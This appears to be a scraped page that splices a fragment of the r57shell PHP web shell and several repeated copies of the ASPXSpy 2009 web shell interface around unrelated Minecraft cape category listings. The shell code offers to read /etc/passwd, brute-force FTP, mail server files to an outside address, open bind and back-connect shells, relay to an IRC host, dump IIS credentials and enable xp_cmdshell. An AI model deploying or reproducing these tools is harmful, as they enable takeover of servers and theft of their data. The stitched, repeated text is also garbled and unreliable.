'.div('id9').''; echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval'); echo '
'.ws(1).in('submit','submit',0,$lang[$language.'_butt1']); echo '
'; echo $table_end1.$fe; if($safe_mode&&$curl_on) { echo $fs.$table_up1.$lang[$language.'_text33'].up_down('id10').$table_up2.div('id10').$ts; echo sr(15,''.$lang[$language.'_text30'].$arrow.'',in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):('/etc/passwd'))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); echo $te.''.$table_end1.$fe; } if($safe_mode) { echo $fs.$table_up1.$lang[$language.'_text34'].up_down('id11').$table_up2.div('id11').$ts; echo '
'; echo sr(15,''.$lang[$language.'_text30'].$arrow.'',in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):('/etc/passwd'))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); echo $te.''.$table_end1.$fe; } if($safe_mode&&$mysql_on) { echo $fs.$table_up1.$lang[$language.'_text35'].up_down('id12').$table_up2.div('id12').$ts; echo sr(15,''.$lang[$language.'_text36'].$arrow.'',in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):('mysql'))).ws(4).''.$lang[$language.'_text37'].$arrow.''.in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):('root'))).ws(4).''.$lang[$language.'_text38'].$arrow.''.in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):('password'))).ws(4).''.$lang[$language.'_text14'].$arrow.''.in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):('3306')))); echo sr(15,''.$lang[$language.'_text30'].$arrow.'',in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):('/etc/passwd'))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); echo $te.''.$table_end1.$fe; } if($safe_mode&&$mssql_on) { echo $fs.$table_up1.$lang[$language.'_text85'].up_down('id13').$table_up2.div('id13').$ts; echo sr(15,''.$lang[$language.'_text36'].$arrow.'',in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):('master'))).ws(4).''.$lang[$language.'_text37'].$arrow.''.in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):('sa'))).ws(4).''.$lang[$language.'_text38'].$arrow.''.in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):('password'))).ws(4).''.$lang[$language.'_text14'].$arrow.''.in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):('1433')))); echo sr(15,''.$lang[$language.'_text3'].$arrow.'',in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):('dir'))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); echo $te.''.$table_end1.$fe; } if(@ini_get('file_uploads')){ echo ''; echo $table_up1.$lang[$language.'_text5'].up_down('id14').$table_up2.div('id14').$ts; echo sr(15,''.$lang[$language.'_text6'].$arrow.'',in('file','userfile',85,'')); echo sr(15,''.$lang[$language.'_text21'].$arrow.'',in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); echo $te.''.$table_end1.$fe; } if(!$safe_mode&&!$windows){ echo $fs.$table_up1.$lang[$language.'_text15'].up_down('id15').$table_up2.div('id15').$ts; echo sr(15,''.$lang[$language.'_text16'].$arrow.'',''.in('hidden','dir',0,$dir).ws(2).''.$lang[$language.'_text17'].$arrow.''.in('text','rem_file',78,'http://')); echo sr(15,''.$lang[$language.'_text18'].$arrow.'',in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); echo $te.''.$table_end1.$fe; } echo $fs.$table_up1.$lang[$language.'_text86'].up_down('id16').$table_up2.div('id16').$ts; echo sr(15,''.$lang[$language.'_text59'].$arrow.'',in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14'])); $arh = $lang[$language.'_text92']; if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip'; } if(@function_exists('gzencode')) { $arh .= in('radio','compress',0,'gzip').' gzip'; } if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; } echo sr(15,''.$lang[$language.'_text91'].$arrow.'',in('radio','compress',0,'none').' '.$arh); echo $te.''.$table_end1.$fe; if(@function_exists('ftp_connect')){ echo $table_up1.$lang[$language.'_text93'].up_down('id17').$table_up2.div('id17').$ts.''.$fs.''.$fe.$fs.''.$fe.'
'.$ts; echo '
'.$lang[$language.'_text87'].'
'; echo sr(25,''.$lang[$language.'_text88'].$arrow.'',in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):('127.0.0.1:21')))); echo sr(25,''.$lang[$language.'_text37'].$arrow.'',in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):('anonymous')))); echo sr(25,''.$lang[$language.'_text38'].$arrow.'',in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):('billy@microsoft.com')))); echo sr(25,''.$lang[$language.'_text89'].$arrow.'',in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):('/ftp-dir/file'))).in('hidden','cmd',0,'ftp_file_down')); echo sr(25,''.$lang[$language.'_text18'].$arrow.'',in('text','loc_file',45,$dir)); echo sr(25,''.$lang[$language.'_text90'].$arrow.'',''.in('hidden','dir',0,$dir)); echo sr(25,'',in('submit','submit',0,$lang[$language.'_butt14'])); echo $te.'
'.$ts; echo '
'.$lang[$language.'_text100'].'
'; echo sr(25,''.$lang[$language.'_text88'].$arrow.'',in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):('127.0.0.1:21')))); echo sr(25,''.$lang[$language.'_text37'].$arrow.'',in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):('anonymous')))); echo sr(25,''.$lang[$language.'_text38'].$arrow.'',in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):('billy@microsoft.com')))); echo sr(25,''.$lang[$language.'_text18'].$arrow.'',in('text','loc_file',45,$dir)); echo sr(25,''.$lang[$language.'_text89'].$arrow.'',in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):('/ftp-dir/file'))).in('hidden','cmd',0,'ftp_file_up')); echo sr(25,''.$lang[$language.'_text90'].$arrow.'',''.in('hidden','dir',0,$dir)); echo sr(25,'',in('submit','submit',0,$lang[$language.'_butt2'])); echo $te.'
'; } if($unix && @function_exists('ftp_connect')){ echo $fs.$table_up1.$lang[$language.'_text94'].up_down('id18').$table_up2.div('id18').$ts; echo sr(15,''.$lang[$language.'_text88'].$arrow.'',in('text','ftp_server_port',85,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):('127.0.0.1:21'))).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); echo sr(15,'',''.$lang[$language.'_text99'].' ( '.$lang[$language.'_text95'].' )'); echo sr(15,'',in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text101']); echo $te.''.$table_end1.$fe; } if(@function_exists('mail')){ echo $table_up1.$lang[$language.'_text102'].up_down('id19').$table_up2.div('id19').$ts.''.$fs.''.$ts; echo '
'.$lang[$language.'_text103'].'
'; echo sr(25,''.$lang[$language.'_text105'].$arrow.'',in('text','to',45,(!empty($_POST['to'])?($_POST['to']):('hacker@mail.com'))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir)); echo sr(25,''.$lang[$language.'_text106'].$arrow.'',in('text','from',45,(!empty($_POST['from'])?($_POST['from']):('billy@microsoft.com')))); echo sr(25,''.$lang[$language.'_text107'].$arrow.'',in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):('hello billy')))); echo sr(25,''.$lang[$language.'_text108'].$arrow.'',''); echo sr(25,'',in('submit','submit',0,$lang[$language.'_butt15'])); echo $te.''.$fe.$fs.''.$ts; echo '
'.$lang[$language.'_text104'].'
'; echo sr(25,''.$lang[$language.'_text105'].$arrow.'',in('text','to',45,(!empty($_POST['to'])?($_POST['to']):('hacker@mail.com'))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir)); echo sr(25,''.$lang[$language.'_text106'].$arrow.'',in('text','from',45,(!empty($_POST['from'])?($_POST['from']):('billy@microsoft.com')))); echo sr(25,''.$lang[$language.'_text107'].$arrow.'',in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):('file from r57shell')))); echo sr(25,''.$lang[$language.'_text18'].$arrow.'',in('text','loc_file',45,$dir)); $arh = $lang[$language.'_text92']; if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip'; } if(@function_exists('gzencode')) { $arh .= in('radio','compress',0,'gzip').' gzip'; } if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; } echo sr(25,''.$lang[$language.'_text91'].$arrow.'',in('radio','compress',0,'none').' '.$arh); echo sr(25,'',in('submit','submit',0,$lang[$language.'_butt15'])); echo $te.''.$fe.''; } if($mysql_on||$mssql_on||$pg_on||$ora_on) { $select = ''; echo $table_up1.$lang[$language.'_text82'].up_down('id20').$table_up2.div('id20').$ts.''.$fs.''.$ts; echo '
'.$lang[$language.'_text77'].'
'; echo sr(45,''.$lang[$language.'_text80'].$arrow.'',$select); echo sr(45,''.$lang[$language.'_text14'].$arrow.'',in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):('3306')))); echo sr(45,''.$lang[$language.'_text37'].$arrow.'',in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):('root')))); echo sr(45,''.$lang[$language.'_text38'].$arrow.'',in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):('password')))); echo sr(45,''.$lang[$language.'_text78'].$arrow.'',in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_show').in('checkbox','st id=st',0,'1')); echo sr(45,''.$lang[$language.'_text79'].$arrow.'',in('checkbox','sc id=sc',0,'1')); echo sr(45,'',in('submit','submit',0,$lang[$language.'_butt7'])); echo $te.''.$fe.$fs.''.$ts; echo '
'.$lang[$language.'_text40'].'
'; echo sr(45,''.$lang[$language.'_text80'].$arrow.'',$select); echo sr(45,''.$lang[$language.'_text14'].$arrow.'',in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):('3306')))); echo sr(45,''.$lang[$language.'_text37'].$arrow.'',in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):('root')))); echo sr(45,''.$lang[$language.'_text38'].$arrow.'',in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):('password')))); echo sr(45,''.$lang[$language.'_text36'].$arrow.'',in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):('mysql')))); echo sr(45,''.$lang[$language.'_text39'].$arrow.'',in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):('user')))); echo sr(45,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump').''.$lang[$language.'_text41'].$arrow.'',in('checkbox','dif id=dif',0,'1')); echo sr(45,''.$lang[$language.'_text59'].$arrow.'',in('text','dif_name',15,(!empty($_POST['dif_name'])?($_POST['dif_name']):('dump.sql')))); echo sr(45,'',in('submit','submit',0,$lang[$language.'_butt9'])); echo $te.''.$fe.$fs.''.$ts; echo '
'.$lang[$language.'_text83'].'
'; echo sr(45,''.$lang[$language.'_text80'].$arrow.'',$select); echo sr(45,''.$lang[$language.'_text14'].$arrow.'',in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):('3306')))); echo sr(45,''.$lang[$language.'_text37'].$arrow.'',in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):('root')))); echo sr(45,''.$lang[$language.'_text38'].$arrow.'',in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):('password')))); echo sr(45,''.$lang[$language.'_text36'].$arrow.'',in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):('mysql')))); echo sr(45,''.$lang[$language.'_text84'].$arrow.''.in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),''); echo $te.'

'.in('submit','submit',0,$lang[$language.'_butt1']).'
'.$fe.''; } if(!$safe_mode&&!$windows){ echo $table_up1.$lang[$language.'_text81'].up_down('id21').$table_up2.div('id21').$ts.''.$fs.''.$ts; echo '
'.$lang[$language.'_text9'].'
'; echo sr(40,''.$lang[$language.'_text10'].$arrow.'',in('text','port',15,'11457')); echo sr(40,''.$lang[$language.'_text11'].$arrow.'',in('text','bind_pass',15,'r57')); echo sr(40,''.$lang[$language.'_text20'].$arrow.'',''.in('hidden','dir',0,$dir)); echo sr(40,'',in('submit','submit',0,$lang[$language.'_butt3'])); echo $te.''.$fe.$fs.''.$ts; echo '
'.$lang[$language.'_text12'].'
'; echo sr(40,''.$lang[$language.'_text13'].$arrow.'',in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ('127.0.0.1')))); echo sr(40,''.$lang[$language.'_text14'].$arrow.'',in('text','port',15,'11457')); echo sr(40,''.$lang[$language.'_text20'].$arrow.'',''.in('hidden','dir',0,$dir)); echo sr(40,'',in('submit','submit',0,$lang[$language.'_butt4'])); echo $te.''.$fe.$fs.''.$ts; echo '
'.$lang[$language.'_text22'].'
'; echo sr(40,''.$lang[$language.'_text23'].$arrow.'',in('text','local_port',15,'11457')); echo sr(40,''.$lang[$language.'_text24'].$arrow.'',in('text','remote_host',15,'irc.dalnet.ru')); echo sr(40,''.$lang[$language.'_text25'].$arrow.'',in('text','remote_port',15,'6667')); echo sr(40,''.$lang[$language.'_text26'].$arrow.'',''.in('hidden','dir',0,$dir)); echo sr(40,'',in('submit','submit',0,$lang[$language.'_butt5'])); echo $te.''.$fe.''; } echo ''.$table_up3.'
o---[ r57shell - http-shell by RST/GHC | http://rst.void.ru | http://ghc.ru | version '.$version.' ]---o
'.$f; include ($a.$b.$c); ?>
Animal Capes (51358)
The real monsters of Minecraft!
Crests Capes (4752)
Family, Guild or Server Crests. Well, any Crests.
Flag Capes (9032)
Country or civilization flags in every color.
Holiday Capes (2563)
Let's get festive with some holiday cheer.
Logo Capes (23141)
Logos of anything and everything. No nudies.
Miscellaneous Capes (12887)
A spot for everything else! But come on, don't be lazy.
Object Capes (10556)
Inanimate objects forged into a cape, molded into a file.
Official Capes (12522)
Capes from Mojang or other famous figures.
<%@ import Namespace='System.IO'%> <%@ import Namespace='System.Diagnostics'%> <%@ import Namespace='System.Data'%> <%@ import Namespace='System.Management'%> <%@ import Namespace='System.Data.OleDb'%> <%@ import Namespace='Microsoft.Win32'%> <%@ import Namespace='System.Net.Sockets' %> <%@ import Namespace='System.Net' %> <%@ import Namespace='System.Runtime.InteropServices'%> <%@ import Namespace='System.DirectoryServices'%> <%@ import Namespace='System.ServiceProcess'%> <%@ import Namespace='System.Text.RegularExpressions'%> <%@ Import Namespace='System.Threading'%> <%@ Import Namespace='System.Data.SqlClient'%> <%@ import Namespace='Microsoft.VisualBasic'%> <%@ Assembly Name='System.DirectoryServices,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A'%> <%@ Assembly Name='System.Management,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A'%> <%@ Assembly Name='System.ServiceProcess,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A'%> <%@ Assembly Name='Microsoft.VisualBasic,Version=7.0.3300.0,Culture=neutral,PublicKeyToken=b03f5f7f11d50a3a'%> ASPXspy
ASPXSpy Ver: 2009
| | | | | | | | | | | | |

<%--FileList--%>
Current Directory :
 FilenameLast modifiedSizeAction
| Create Directory | Create File | Kill Me
<%--FileEdit--%>

Current File(import new file name and new file)
DefaultUTF-8

File Content

<%--CloneTime--%>

Alter file

Reference file(fullpath)

Set last modified »

Current file(fullpath)

     

CreationTime : LastWriteTime : LastAccessTime :

<%--IISSpy--%>
IDIIS_USERIIS_PASSDomainPath
<%--Process--%>
IDProcessThreadCountPriorityAction
<%--CmdShell--%>

CmdPath:

Argument:
<%--Services--%>
IDNamePathStateStartMode
<%--Sysinfo--%>



        <%--UserInfo--%>
        <%--SuExp--%>
        UserName : PassWord : Port :
        CmdShell  : 
        <%--Reg--%>

        Registry Path :

        KeyValue
        <%--PortScan--%>

        IP : Port :

        <%--DataBase--%>

        ConnString : MSSQLACCESS

        Please select a database : SQLExec : -- SQL Server Exec --Add xp_cmdshellAdd sp_oacreateAdd xp_cmdshell(SQL2005)Add sp_oacreate(SQL2005)Add makewebtask(SQL2005)Add openrowset/opendatasource(SQL2005)XP_cmdshell execXP_dirtree>c:\bin.asp';'>SP_oamethod execSP_makewebtask make fileSandBoxLogBackupDatabaseBackup
        Run SQL

        <%--PortMap--%>
        Local Ip : Local Port : Remote Ip : Remote Port :

        <%--Search--%>
        Keyword Use Regex
        Replace As Replace
        Search FileType File NameFile Content
        Path


        File PathLast modifiedSize
        Copyright © 2006-2009 Shell Arsivi All Rights Reserved.
        '>shell (0)
        <%@ Page Language='C#' Debug='true' trace='false' validateRequest='false' EnableViewStateMac='false' EnableViewState='true'%> <%@ import Namespace='System.IO'%> <%@ import Namespace='System.Diagnostics'%> <%@ import Namespace='System.Data'%> <%@ import Namespace='System.Management'%> <%@ import Namespace='System.Data.OleDb'%> <%@ import Namespace='Microsoft.Win32'%> <%@ import Namespace='System.Net.Sockets' %> <%@ import Namespace='System.Net' %> <%@ import Namespace='System.Runtime.InteropServices'%> <%@ import Namespace='System.DirectoryServices'%> <%@ import Namespace='System.ServiceProcess'%> <%@ import Namespace='System.Text.RegularExpressions'%> <%@ Import Namespace='System.Threading'%> <%@ Import Namespace='System.Data.SqlClient'%> <%@ import Namespace='Microsoft.VisualBasic'%> <%@ Assembly Name='System.DirectoryServices,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A'%> <%@ Assembly Name='System.Management,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A'%> <%@ Assembly Name='System.ServiceProcess,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A'%> <%@ Assembly Name='Microsoft.VisualBasic,Version=7.0.3300.0,Culture=neutral,PublicKeyToken=b03f5f7f11d50a3a'%> ASPXspy
        Password:

        Copyright © 2009 Bin -- www.rootkit.net.cn

        ASPXSpy Ver: 2009
        | | | | | | | | | | | | |

        <%--FileList--%>
        Current Directory :
         FilenameLast modifiedSizeAction
        | Create Directory | Create File | Kill Me
        <%--FileEdit--%>

        Current File(import new file name and new file)
        DefaultUTF-8

        File Content

        <%--CloneTime--%>

        Alter file

        Reference file(fullpath)

        Set last modified »

        Current file(fullpath)

             

        CreationTime : LastWriteTime : LastAccessTime :

        <%--IISSpy--%>
        IDIIS_USERIIS_PASSDomainPath
        <%--Process--%>
        IDProcessThreadCountPriorityAction
        <%--CmdShell--%>

        CmdPath:

        Argument:
        <%--Services--%>
        IDNamePathStateStartMode
        <%--Sysinfo--%>



              <%--UserInfo--%>
              <%--SuExp--%>
              UserName : PassWord : Port :
              CmdShell  : 
              <%--Reg--%>

              Registry Path :

              KeyValue
              <%--PortScan--%>

              IP : Port :

              <%--DataBase--%>

              ConnString : MSSQLACCESS

              Please select a database : SQLExec : -- SQL Server Exec --Add xp_cmdshellAdd sp_oacreateAdd xp_cmdshell(SQL2005)Add sp_oacreate(SQL2005)Add makewebtask(SQL2005)Add openrowset/opendatasource(SQL2005)XP_cmdshell execXP_dirtree>c:\bin.asp';'>SP_oamethod execSP_makewebtask make fileSandBoxLogBackupDatabaseBackup
              Run SQL

              <%--PortMap--%>
              Local Ip : Local Port : Remote Ip : Remote Port :

              <%--Search--%>
              Keyword Use Regex
              Replace As Replace
              Search FileType File NameFile Content
              Path


              File PathLast modifiedSize
              Copyright © 2006-2009 Shell Arsivi All Rights Reserved.
              <%@ import Namespace='System.IO'%> <%@ import Namespace='System.Diagnostics'%> <%@ import Namespace='System.Data'%> <%@ import Namespace='System.Management'%> <%@ import Namespace='System.Data.OleDb'%> <%@ import Namespace='Microsoft.Win32'%> <%@ import Namespace='System.Net.Sockets' %> <%@ import Namespace='System.Net' %> <%@ import Namespace='System.Runtime.InteropServices'%> <%@ import Namespace='System.DirectoryServices'%> <%@ import Namespace='System.ServiceProcess'%> <%@ import Namespace='System.Text.RegularExpressions'%> <%@ Import Namespace='System.Threading'%> <%@ Import Namespace='System.Data.SqlClient'%> <%@ import Namespace='Microsoft.VisualBasic'%> <%@ Assembly Name='System.DirectoryServices,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A'%> <%@ Assembly Name='System.Management,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A'%> <%@ Assembly Name='System.ServiceProcess,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A'%> <%@ Assembly Name='Microsoft.VisualBasic,Version=7.0.3300.0,Culture=neutral,PublicKeyToken=b03f5f7f11d50a3a'%> ASPXspy
              ASPXSpy Ver: 2009
              | | | | | | | | | | | | |

              <%--FileList--%>
              Current Directory :
               FilenameLast modifiedSizeAction
              | Create Directory | Create File | Kill Me
              <%--FileEdit--%>

              Current File(import new file name and new file)
              DefaultUTF-8

              File Content

              <%--CloneTime--%>

              Alter file

              Reference file(fullpath)

              Set last modified »

              Current file(fullpath)

                   

              CreationTime : LastWriteTime : LastAccessTime :

              <%--IISSpy--%>
              IDIIS_USERIIS_PASSDomainPath
              <%--Process--%>
              IDProcessThreadCountPriorityAction
              <%--CmdShell--%>

              CmdPath:

              Argument:
              <%--Services--%>
              IDNamePathStateStartMode
              <%--Sysinfo--%>



                    <%--UserInfo--%>
                    <%--SuExp--%>
                    UserName : PassWord : Port :
                    CmdShell  : 
                    <%--Reg--%>

                    Registry Path :

                    KeyValue
                    <%--PortScan--%>

                    IP : Port :

                    <%--DataBase--%>

                    ConnString : MSSQLACCESS

                    Please select a database : SQLExec : -- SQL Server Exec --Add xp_cmdshellAdd sp_oacreateAdd xp_cmdshell(SQL2005)Add sp_oacreate(SQL2005)Add makewebtask(SQL2005)Add openrowset/opendatasource(SQL2005)XP_cmdshell execXP_dirtree>c:\bin.asp';'>SP_oamethod execSP_makewebtask make fileSandBoxLogBackupDatabaseBackup
                    Run SQL

                    <%--PortMap--%>
                    Local Ip : Local Port : Remote Ip : Remote Port :

                    <%--Search--%>
                    Keyword Use Regex
                    Replace As Replace
                    Search FileType File NameFile Content
                    Path


                    File PathLast modifiedSize
                    Copyright © 2006-2009 Shell Arsivi All Rights Reserved.
                    '>shell (0)
                    <%@ Page Language='C#' Debug='true' trace='false' validateRequest='false' EnableViewStateMac='false' EnableViewState='true'%> <%@ import Namespace='System.IO'%> <%@ import Namespace='System.Diagnostics'%> <%@ import Namespace='System.Data'%> <%@ import Namespace='System.Management'%> <%@ import Namespace='System.Data.OleDb'%> <%@ import Namespace='Microsoft.Win32'%> <%@ import Namespace='System.Net.Sockets' %> <%@ import Namespace='System.Net' %> <%@ import Namespace='System.Runtime.InteropServices'%> <%@ import Namespace='System.DirectoryServices'%> <%@ import Namespace='System.ServiceProcess'%> <%@ import Namespace='System.Text.RegularExpressions'%> <%@ Import Namespace='System.Threading'%> <%@ Import Namespace='System.Data.SqlClient'%> <%@ import Namespace='Microsoft.VisualBasic'%> <%@ Assembly Name='System.DirectoryServices,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A'%> <%@ Assembly Name='System.Management,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A'%> <%@ Assembly Name='System.ServiceProcess,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A'%> <%@ Assembly Name='Microsoft.VisualBasic,Version=7.0.3300.0,Culture=neutral,PublicKeyToken=b03f5f7f11d50a3a'%> ASPXspy
                    Password:

                    Copyright © 2009 Bin -- www.rootkit.net.cn

                    ASPXSpy Ver: 2009
                    | | | | | | | | | | | | |

                    <%--FileList--%>
                    Current Directory :
                     FilenameLast modifiedSizeAction
                    | Create Directory | Create File | Kill Me
                    <%--FileEdit--%>

                    Current File(import new file name and new file)
                    DefaultUTF-8

                    File Content

                    <%--CloneTime--%>

                    Alter file

                    Reference file(fullpath)

                    Set last modified »

                    Current file(fullpath)

                         

                    CreationTime : LastWriteTime : LastAccessTime :

                    <%--IISSpy--%>
                    IDIIS_USERIIS_PASSDomainPath
                    <%--Process--%>
                    IDProcessThreadCountPriorityAction
                    <%--CmdShell--%>

                    CmdPath:

                    Argument:
                    <%--Services--%>
                    IDNamePathStateStartMode
                    <%--Sysinfo--%>



                          <%--UserInfo--%>
                          <%--SuExp--%>
                          UserName : PassWord : Port :
                          CmdShell  : 
                          <%--Reg--%>

                          Registry Path :

                          KeyValue
                          <%--PortScan--%>

                          IP : Port :

                          <%--DataBase--%>

                          ConnString : MSSQLACCESS

                          Please select a database : SQLExec : -- SQL Server Exec --Add xp_cmdshellAdd sp_oacreateAdd xp_cmdshell(SQL2005)Add sp_oacreate(SQL2005)Add makewebtask(SQL2005)Add openrowset/opendatasource(SQL2005)XP_cmdshell execXP_dirtree>c:\bin.asp';'>SP_oamethod execSP_makewebtask make fileSandBoxLogBackupDatabaseBackup
                          Run SQL

                          <%--PortMap--%>
                          Local Ip : Local Port : Remote Ip : Remote Port :

                          <%--Search--%>
                          Keyword Use Regex
                          Replace As Replace
                          Search FileType File NameFile Content
                          Path


                          File PathLast modifiedSize
                          Copyright © 2006-2009 Shell Arsivi All Rights Reserved.
                          <%@ import Namespace='System.IO'%> <%@ import Namespace='System.Diagnostics'%> <%@ import Namespace='System.Data'%> <%@ import Namespace='System.Management'%> <%@ import Namespace='System.Data.OleDb'%> <%@ import Namespace='Microsoft.Win32'%> <%@ import Namespace='System.Net.Sockets' %> <%@ import Namespace='System.Net' %> <%@ import Namespace='System.Runtime.InteropServices'%> <%@ import Namespace='System.DirectoryServices'%> <%@ import Namespace='System.ServiceProcess'%> <%@ import Namespace='System.Text.RegularExpressions'%> <%@ Import Namespace='System.Threading'%> <%@ Import Namespace='System.Data.SqlClient'%> <%@ import Namespace='Microsoft.VisualBasic'%> <%@ Assembly Name='System.DirectoryServices,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A'%> <%@ Assembly Name='System.Management,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A'%> <%@ Assembly Name='System.ServiceProcess,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A'%> <%@ Assembly Name='Microsoft.VisualBasic,Version=7.0.3300.0,Culture=neutral,PublicKeyToken=b03f5f7f11d50a3a'%> ASPXspy
                          ASPXSpy Ver: 2009
                          | | | | | | | | | | | | |

                          <%--FileList--%>
                          Current Directory :
                           FilenameLast modifiedSizeAction
                          | Create Directory | Create File | Kill Me
                          <%--FileEdit--%>

                          Current File(import new file name and new file)
                          DefaultUTF-8

                          File Content

                          <%--CloneTime--%>

                          Alter file

                          Reference file(fullpath)

                          Set last modified »

                          Current file(fullpath)

                               

                          CreationTime : LastWriteTime : LastAccessTime :

                          <%--IISSpy--%>
                          IDIIS_USERIIS_PASSDomainPath
                          <%--Process--%>
                          IDProcessThreadCountPriorityAction
                          <%--CmdShell--%>

                          CmdPath:

                          Argument:
                          <%--Services--%>
                          IDNamePathStateStartMode
                          <%--Sysinfo--%>



                                <%--UserInfo--%>
                                <%--SuExp--%>
                                UserName : PassWord : Port :
                                CmdShell  : 
                                <%--Reg--%>

                                Registry Path :

                                KeyValue
                                <%--PortScan--%>

                                IP : Port :

                                <%--DataBase--%>

                                ConnString : MSSQLACCESS

                                Please select a database : SQLExec : -- SQL Server Exec --Add xp_cmdshellAdd sp_oacreateAdd xp_cmdshell(SQL2005)Add sp_oacreate(SQL2005)Add makewebtask(SQL2005)Add openrowset/opendatasource(SQL2005)XP_cmdshell execXP_dirtree>c:\bin.asp';'>SP_oamethod execSP_makewebtask make fileSandBoxLogBackupDatabaseBackup
                                Run SQL

                                <%--PortMap--%>
                                Local Ip : Local Port : Remote Ip : Remote Port :

                                <%--Search--%>
                                Keyword Use Regex
                                Replace As Replace
                                Search FileType File NameFile Content
                                Path


                                File PathLast modifiedSize
                                Copyright © 2006-2009 Shell Arsivi All Rights Reserved.
                                '>shell (0)
